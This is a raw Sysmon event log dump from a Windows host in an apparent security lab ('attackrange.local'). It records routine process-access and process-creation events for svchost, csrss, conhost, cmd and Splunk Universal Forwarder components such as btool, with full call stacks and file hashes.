12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-4000-00000000AE01}38603864C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.235{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647E-6064-4000-00000000AE01}3860C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.221{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.221{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.221{266CAFBE-647E-6064-3F00-00000000AE01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{00000000-0000-0000-0000-000000000000}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.223{266CAFBE-647E-6064-4000-00000000AE01}3860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.205{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.205{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.205{266CAFBE-647E-6064-3E00-00000000AE01}38283832C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.208{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.190{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.190{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.190{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.201{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.190{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:02.174{266CAFBE-646A-6064-0A00-00000000AE01}840\Winsock2\CatalogChangeListener-348-0C:\Windows\system32\services.exe 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.174{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3D00-00000000AE01}3796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.174{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 